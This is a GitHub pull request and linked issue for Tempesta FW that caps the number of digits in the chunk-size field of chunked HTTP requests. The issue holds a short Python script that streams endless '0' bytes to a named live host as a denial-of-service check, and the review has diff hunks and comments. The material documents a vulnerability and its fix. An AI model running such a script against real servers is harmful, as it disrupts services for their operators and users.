### PR TITLE
Fix #768: Set limit for digits count in 'chunk-size' field of chunked request.

### LINKED ISSUE #768: Chunked Transfer Coding - chunk-size decoding issue
As per RFC 7230 (4.1):

~~~
     chunked-body   = *chunk
                      last-chunk
                      trailer-part
                      CRLF

     chunk          = chunk-size [ chunk-ext ] CRLF
                      chunk-data CRLF
     chunk-size     = 1*HEXDIG
     last-chunk     = 1*("0") [ chunk-ext ] CRLF

     chunk-data     = 1*OCTET ; a sequence of chunk-size octets
~~~

Tempesta uses [parse_int_hex](https://github.com/tempesta-tech/tempesta/blob/master/tempesta_fw/http_parser.c#L483) to decode the length. But that function doesn't track the length of the size field itself. So, it's possible to use any amount of leading zeroes ('0') and although it's allowed by RFC this can be used to cause kind of DOS attack:

~~~
000...000100500
bla-bla...
0000....0000....000...
~~~

The script to check the issue:
~~~
import socket

s = socket.socket()
s.connect(('tempesta-tech.com', 80))

s.send("POST / HTTP/1.1\n")
s.send("Host: tempesta-tech.com\n")
s.send("Transfer-Encoding: chunked\n")
s.send("\n")
s.send("5\nHELLO\n")

while True:
    s.send('0')
~~~

### PR DESCRIPTION
**Pull request by aleksostapenko**

### CODE REVIEW

File: tempesta_fw/http_parser.c [hunk 1]
```diff
@@ -489,7 +490,12 @@ parse_int_hex(unsigned char *data, size_t len, unsigned long *acc)
 			return CSTR_NEQ;
 		if (unlikely(*acc > (UINT_MAX - 16) / 16))
 			return CSTR_BADLEN;
+		if (unlikely(*d_count >= (sizeof(*acc) - 1))) {
```
Comment (ikoveshnikov) [inline tempesta_fw/http_parser.c]: You save half a byte on every read operation. Condition above allows you to store only 3 bytes. I doubt that it was a desired behaviour.

**Comment by ikoveshnikov** [comment]
Please, also add unit test to `test_http_parser.c`.

File: tempesta_fw/http_parser.c (hunk 1 above)
Comment (aleksostapenko) [inline tempesta_fw/http_parser.c]: Corrected

Comment (aleksostapenko) [inline tempesta_fw/http_parser.c]: Corrected to `>= sizeof(int) * 2`

File: tempesta_fw/http.h [hunk 2]
```diff
@@ -260,6 +261,7 @@ typedef struct {
  */
 typedef struct {
 	unsigned short	to_go;
+	unsigned short	_d_count;
```
Comment (aleksostapenko) [inline tempesta_fw/http.h]: Corrected.

File: tempesta_fw/http_parser.c [hunk 3]
```diff
@@ -489,7 +490,12 @@ parse_int_hex(unsigned char *data, size_t len, unsigned long *acc)
...
+			TFW_DBG_ADDR("Too many digits in chunk-size field", addr);
```
Comment (aleksostapenko) [inline tempesta_fw/http_parser.c]: Debug printout and extra argument `addr` had been removed.

**Pull request merged**